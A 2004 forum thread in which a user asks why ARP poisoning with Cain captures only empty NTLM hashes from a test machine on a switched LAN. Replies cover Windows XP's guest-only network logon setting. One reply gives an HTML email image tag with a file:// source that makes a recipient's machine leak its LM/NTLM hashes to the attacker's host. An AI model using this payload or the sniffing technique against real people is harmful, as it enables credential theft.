Sniffing NTLM

Printable View

November 13th, 2004, 06:41 AM
defzons

Sniffing NTLM

I was wondering about what might be wrong here:
I was trying to get the NTLM hashes from another test computer in my switched LAN.
Started Cain ( www.oxid.it ) Enabled ARP poison routing, got to the other computer to log on to the computer running Cain. Then checked Cain, yes it sniffed SMB-actions. Imported the hashes to the cracker, but all the passwords where "empty". Noticed that these logons where logged on as Guest. Darn.. So I changed the Guest account password. And tried again. This time the logon attempts where Failed. And I got new hashes, but again the pass. where "empty".
The reason why I tried the above was that I have been told that windows will try the logged in user as an final attempt to access network shares on another computer..

Anyone who figures out what went wrong in my attempt? :)
November 15th, 2004, 02:23 PM
SirDice

It's the client that's sending the "empty" password.
November 15th, 2004, 09:06 PM
defzons

Yes.. That's right, but is there any way I can force the client computer to send his password hashes? I have seen some options in sniffer programs where it is possible to "force cleartext password" ++. Is this what makes me get his password hashes?
November 16th, 2004, 01:00 PM
SirDice

What's the client's OS? What's the server's OS?
November 17th, 2004, 09:11 AM
defzons

Both are using Microsoft Windows Xp Home Edition.
November 22nd, 2004, 11:23 AM
josephjohnt

By default Windows XP authenticates a network user as guest. This can be the issue here. On Windows XP Pro you can change this from the Group Policy -
Computer Config > Windows settings > Security settings > Local policies > Security Options > Network access:Sharing and security model for local accounts
Not sure of this option on Home edition. Hope this helps.
November 22nd, 2004, 12:02 PM
anban

Your computer will send NTLM password for authenitication if you have an DHCP server in the network, otherwise as some one told it will be using your guest account for shares.

For me with DHCP it works fine.
November 22nd, 2004, 01:48 PM
josephjohnt

I've not seen any relation between network authentication and DHCP. Networks with static IP address also work with NTLM authentication.
November 25th, 2004, 07:40 AM
vvuiverine

To get a machine to send its LM and NTLM hashes send an html e-mail with the following in the document:

<img src=file://nbmachinename/null/gif height=1 width=1>

that will cause the client to send hashes for the current user (works on my network anywayz)
November 25th, 2004, 04:21 PM
djscribble

wasn't this one of the vunerabilities that was patched with the jpeg patch??
November 26th, 2004, 08:07 PM
Riot

how would that work sending <img src=file://nbmachinename/null/gif height=1 width=1> in an html e-mail it would have to be straight to the machine wouldn't it be so how would you send that to a machine in a network.